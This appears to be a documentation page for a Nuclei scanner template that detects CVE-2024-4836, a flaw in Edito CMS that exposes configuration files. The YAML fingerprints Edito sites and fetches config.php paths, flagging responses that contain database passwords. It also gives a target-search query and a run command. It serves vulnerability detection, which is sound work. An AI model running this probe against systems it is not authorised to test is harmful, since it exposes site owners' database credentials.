Edito CMS - Sensitive Data Leak
ID: CVE-2024-4836
Severity: high
Author: s4e-io
Tags: cve,cve2024,cms,edito,info-leak
Description
Section titled “Description”Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.
YAML Source
Section titled “YAML Source”id: CVE-2024-4836
info: name: Edito CMS - Sensitive Data Leak author: s4e-io severity: high description: | Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user. reference: - https://cert.pl/en/posts/2024/07/CVE-2024-4836/ - https://github.com/sleep46/CVE-2024-4836_Check - https://nvd.nist.gov/vuln/detail/CVE-2024-4836 metadata: max-request: 5 fofa-query: icon_hash="1491301339" tags: cve,cve2024,cms,edito,info-leak
flow: http(1) && http(2)
http: - method: GET path: - "{{BaseURL}}"
matchers: - type: dsl dsl: - 'contains_any(body,"content=\"edito", "www.edito.pl")' - "status_code==200" condition: and internal: true
- method: GET path: - "{{BaseURL}}/config.php" - "{{BaseURL}}/config/config.php" - "{{BaseURL}}/include/config.php" - "{{BaseURL}}/includes/config.php"
matchers: - type: dsl dsl: - 'contains_all(body,"db_password", "db_username")' - "status_code==200" condition: and# digest: 4b0a00483046022100e7c277c65e43e1ee8f1e0cc24b3a06f7e83af54e3b77900f7ba7ce52d2158536022100e8f4cd406dd6690bf5bac42f59e3e478e87e3c4c73fbaf4f6ab6c185ad0fa003:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-4836.yaml"